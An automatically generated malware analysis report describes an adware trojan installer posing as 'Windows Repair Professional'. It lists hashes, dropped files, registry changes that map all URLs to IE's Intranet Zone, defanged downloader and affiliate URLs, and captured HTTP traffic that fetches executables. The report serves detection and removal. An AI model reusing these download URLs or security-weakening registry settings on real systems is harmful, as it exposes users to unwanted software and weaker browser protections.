not-a-virus:AdWare.Win32.AdLoad.erjk (Kaspersky), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: def705210ccd222720617c001d355d6e
SHA1: e10afc3fb2fa17020df1dc07a1f2a60f5630c6af
SHA256: 5373f1ef8512636223fc658a30724f696cf471cccf354cf4d73f4007d6a9b163
SSDeep: 12288:ydOv5jKhsfoPA yeVKUCUxP4C902bdRtJJPipFT6sEUigDkJ:ydq5TfcdHj4fmbCynEkJ
Size: 606131 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: OXQCN
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):No processes have been created.The Trojan injects its code into the following process(es):
NojM0TDHJX.exe:1980
%original file name%.exe:1616
cpSetup.exe:568
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process NojM0TDHJX.exe:1980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx4.tmp (1778 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\1119458637 (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\BgWorker.dll (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\cpSetup.exe (4805 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp (0 bytes)
The process %original file name%.exe:1616 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\S (179 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NojM0TDHJX.exe (8278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NSISdl.dll (14 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (0 bytes)
The process cpSetup.exe:568 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IDELG32N\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00075542.a (1690 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4BSXI3UX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q3O76FGN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00074d91.a (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx7.tmp (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GNSBSD4B\desktop.ini (67 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx8.tmp (0 bytes)
Registry activity
The process NojM0TDHJX.exe:1980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 64 0C 52 E7 45 47 39 B5 A1 0E DB 47 CB 74 16"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process %original file name%.exe:1616 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 EC 84 9D 20 C2 B7 54 FE 10 CF EE 5B 8C DB 8A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process cpSetup.exe:568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 05 05 B2 D0 2E A7 87 C1 BB E1 4E E3 6B C7 16"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
Dropped PE files
MD5 | File path |
---|---|
8ec3a46db0f5d311571b3c0c62dc0d05 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\00074d91.a |
e8f5383b782fee176aff1ff243f1f501 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\00075542.a |
a5f8399a743ab7f9c88c645c35b1ebb5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\NSISdl.dll |
905d7368f8c25e0b12e6c5c1e036e7b7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\NojM0TDHJX.exe |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\System.dll |
33ec04738007e665059cf40bc0f0c22b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\BgWorker.dll |
a5f8399a743ab7f9c88c645c35b1ebb5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\NSISdl.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\System.dll |
30741f682e9d12149beb9266fb790426 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\cpSetup.exe |
6206b94f91e92b7f7f72214c438dd414 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\nsArray.dll |
c10e04dd4ad4277d5adc951bb331c777 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\nsDialogs.dll |
0309822592797cc6d1052d2735f20065 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nsx4.tmp (1778 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\1119458637 (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\BgWorker.dll (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\cpSetup.exe (4805 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\S (179 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NojM0TDHJX.exe (8278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IDELG32N\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00075542.a (1690 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4BSXI3UX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q3O76FGN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00074d91.a (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx7.tmp (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GNSBSD4B\desktop.ini (67 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
.ndata | 192512 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 233472 | 45048 | 45056 | 2.26212 | 5fffcf2497e851763fd62f4eee795079 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://dna4mm5c1mahl.cloudfront.net/launch_reb.php?p=sevenzip&tid=4272132&pid=735&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChBbGwgSW4gT25lKSAzLjIuMiArIFBvcnRhYmxlICsgU2VyaWFs&b_typ=pe | |
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial | |
hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=735&tid=4272132&b_typ=pe&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChB&reb=1 | |
hxxp://d24txo22v2kbr3.cloudfront.net/?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11 | |
hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=735&aff_sub2=4272132&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.int-cp-234.xyz/offer.php?affId={aff_id}&trackingId=874446&instId=11&ho_trackingid={transaction_id}&cc=UA | 52.17.177.26 |
hxxp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA | 54.239.168.162 |
hxxp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA | 54.239.168.162 |
hxxp://up.int-cp2-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA | 54.88.21.193 |
hxxp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57 | 54.239.168.162 |
hxxp://get.fc-gosh.biz/launch_reb.php?p=sevenzip&tid=4272132&pid=735&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChBbGwgSW4gT25lKSAzLjIuMiArIFBvcnRhYmxlICsgU2VyaWFs&b_typ=pe | 54.239.168.254 |
hxxp://dl.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial | 54.239.168.173 |
hxxp://capital.go2cloud.orghxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=735&aff_sub2=4272132&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.int-cp-234.xyz/offer.php?affId={aff_id}&trackingId=874446&instId=11&ho_trackingid={transaction_id}&cc=UA | 52.17.177.26 |
hxxp://get.cp-retr.xyz/?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11 | 54.239.168.42 |
hxxp://tap.winre.xyz/launch_v5.php?p=sevenzip&pid=735&tid=4272132&b_typ=pe&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChB&reb=1 | 54.239.168.70 |
hxxp://up.int-cp-234.xyzhxxp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA | 54.239.168.162 |
hxxp://up.int-cp-234.xyzhxxp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA | 54.239.168.162 |
hxxp://up.int-cp-234.xyzhxxp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57 | 54.239.168.162 |
hxxp://up.int-cp2-234.xyzhxxp://up.int-cp2-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA | 54.88.21.193 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET hXXp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57 HTTP/1.1
Host: up.int-cp-234.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 409128
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 13 Aug 2015 00:45:51 GMT
X-Cache: Miss from cloudfront
Via: 1.1 affe26bf02a36a4a45ea1eb3ce2b4a62.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 3AgamjltkJULGHtW2r49AY2gNqm91hyzrbUxeYApaBL7338gzXHjPw==
.!.:M.(........FKz)N..8..7.\...... ....bT......#....._......_h....`....9K....w..f......o&.].fg..z%..6....m....B..,.L.A....p........F.zN......N.W....).H.,\......Qe....M....-.2........d...D.H.r'!.t6].|.....Y.:u.0.p....n.8...w$.T.)....0.'fs.........(......8b69....-.p...Ee...\..o...[.X...e.e.i./.C...Qhd..nMyO.EH2F.E.M.N..?.<'...(t...Vw...L.]...<....].c...u*/.9...G.W.;..~.f.&L6...".5.T~s.V.=..#hM5v7.e/A#.q..n.e.K..S....E..t../..(.w.......-..NEfg3...D.`...P..#w.p..=);.J$Vs.g..._.Lb..t.q..._...r.].......J.-.7'...*....zB...: ...e.gY}3^4.TA.jv..l..~)]u@w..z.....$...BU.@.......Ff.#.9xD..F.>.D...qS~.i...3...%....~...."z.x...Ww.....)1.I.vQ8}...UC...3 V..;D.wR..@.y..Hh ?........!AH...I..=.g......[.Pog.u. .6.!|h.@Xe.&3eI.....R..s.2.==|1..$.u".....}.........E....o..E....O.r.....T0....R....Y.'...$......q.c...kf......j....&..M>E....U.(....48h.Y.8..og........I.V.z....7..U..E|..(..\....T)H.<wZ..V..gm....jY.T...Xu.]y....{-..2..8.l....`.......a.I". w.YR.g.......C...........N.-..........Zet7y.`...()..#Hv..)...^?.t..^.Vx..YS;..!.l.W43]L!#d{.F..[T......Y...Q.,.......#_z.j..o%.*R....3...?..-O@....1.G.k.^.......|.s..e..!.a.j`...'..un.S.......GQf.!..is/..;l..1o.J<2 4..[.3...E..ip."..4....h8....LX...l.........s....?..?...4v#.h....IM.nW..4...hX.%9.....'..r?aw.90...t.y..V.p....jN......?...p.|K[a.n..s?v.*..Pl..%......b....^p..]0.\i..naq9..|.x. .p(....:._?.@.V.....l_<..R........^....tW..|P%3....Y'=...(...../"..#b.......`"eam.d.4..Z.9.|...K... ..7.o.nS.G..$9s.(...........NI........n.......G.F.o.]UH...hG).......\r.On4..p..b
<<< skipped >>>
GET hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=735&aff_sub2=4272132&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.int-cp-234.xyz/offer.php?affId={aff_id}&trackingId=874446&instId=11&ho_trackingid={transaction_id}&cc=UA HTTP/1.1
Host: capital.go2cloud.org
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 13 Aug 2015 00:45:52 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02414-102e22fe3dd0a0bd118638fce028d4-1006-4-0-0-0-0-UA-2-3131-373335-34323732313332-30-30-30-193.138.244.231-20150812204552-_-7B11052C012208017E2C3146051A2D427132034F4D51525A1C494616244946210D1A4E041130124B55; expires=Sat, 12 Sep 2015 00:45:52 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfZGV2aWNlX29zIjoiRGVza3RvcCIsIm1vYmlsZV9kZXZpY2VfbW9kZWwiOiJGaXJlZm94IiwibW9iaWxlX2RldmljZV9icmFuZCI6Ik1vemlsbGEiLCJtb2JpbGVfYnJvd3NlciI6IkZpcmVmb3ggRGVza3RvcCIsIm1vYmlsZV9icm93c2VyX3ZlcnNpb24iOiIyLjAiLCJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBGcjsgUnY6MS44LjEuMykgR2Vja28vMjAwNzAzMDkgRmlyZWZveC8yLjAuMC4zIiwiY29ubmVjdGlvbl9zcGVlZCI6ImJyb2FkYmFuZCJ9; expires=Sat, 07 Jul 2018 11:25:52 GMT; path=/;
tracking_id: 102e22fe3dd0a0bd118638fce028d4
X-Robots-Tag: noindex, nofollow
Content-Length: 324
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>302 Found</title>.</head><body>.<h1>Found</h1>.<p>The document has moved <a href="hXXp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA">here</a>.</p>.</body></html>...
<<< skipped >>>
POST hXXp://up.int-cp2-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA HTTP/1.1
Host: up.int-cp2-234.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Content-Type: application/x-www-form-urlencoded
id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57
HTTP/1.1 411 Length Required
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 13 Aug 2015 00:45:50 GMT
Connection: close
Content-Length: 344
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""hXXp://VVV.w3.org/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>Length Required</TITLE>..<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>..<BODY><h2>Length Required</h2>..<hr><p>HTTP Error 411. The request must be chunked or have a content length.</p>..</BODY></HTML>....
GET hXXp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA HTTP/1.1
Host: up.int-cp-234.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 28712
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 13 Aug 2015 00:45:50 GMT
X-Cache: Miss from cloudfront
Via: 1.1 affe26bf02a36a4a45ea1eb3ce2b4a62.cloudfront.net (CloudFront)
X-Amz-Cf-Id: CHp6udWsvm6AJ4HQDfzA_lXU5e5L8IiqwlpdvQBL11cRTsy-wygohQ==
B=.#...]...5<..{wU..........H.....U.M.VW.c.x.4J...:v..U..s\#...^......-O ..v..d...~.!x...9.[...).y.:...)<G.!]......E....j[....,...K.....b...--E.Y.Ib'..o....W./...za.ba0..:....)y1t_.B..s.y...pMRf.*.t.y........T.T.R.9\.U`....KAe.....................H].."W.V."{JBJ............f...^.....>.....f.d...[L;........P.U..Vm.....z|.t....;.w...9..(..e...Z......r5M.QU.. g.y......r.....q....5..m...;7q...6.....WB.F..........SS....n.....9...._$......:..it. ..~..B.._........|.X3.d..<..0........T..4.2..#Y&,....Ak......C.O.5....9......5.&...G/.|..`.k.^2..t...#...B13:.9.[U$.82.H......N..z.w.;.T../.(V|.?...m.X..q.~......{...........q..*...giu.........U.R.>.>.9G..w....UB@_r|J...... .>R(....SHo......X....O....j..R.QW....H.hQ..,9....8.<b.r.C.T..*9...F.4..q...%>h...o3..P.kp .A...N?.$.(?....,.@g..Iy....AqzydfN....5.qSYdB..#[....2A]mi...c..{..g..u.... .$:?d.T_..80uQ...1&....tP....w.:.$.."..c.B.*..4..^.:...4aW..9]...a.....3:0.........U,..%.|.M.a#s... ......'xl..7P...P.`........b..[."...J...[S.....y..Bx.........(..m....l... .....IW..4.....U~b.....rq.`.."..1.J.. ....3.]u..N[.T8.$..W.V..\/......G `4..F.....S........p}.&...A.....An..W....F a....`.>.......5..'.X.g!9...Q..#=..<...V.c?....P{...I.8.<~ds.N.S........*.@e..4v$....U.G.........._X.vS.`&.,..._&... =6f..M.j .E......*./.hF.I....g....,w...G.YVP... ..6..5.e.....c....B../.-...g.'..{..e.]................t..t..i=....*....WB`.t*.....V..u^.&......L..Q\Q..S .62...2G.*..1e2e.ng..._......$.[H.......h.....[..rN2U..!.=..-........2...h.;..S.D....>...`...\.S.z....7
<<< skipped >>>
GET /stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial HTTP/1.0
Host: dl.fripp54.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 76885
Connection: close
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="55cbe8acafcad.exe"
X-Powered-By: ASP.NET
Date: Thu, 13 Aug 2015 00:45:33 GMT
X-Cache: Miss from cloudfront
Via: 1.1 de7a549023f0ea5ae15f58d27aeb67c7.cloudfront.net (CloudFront)
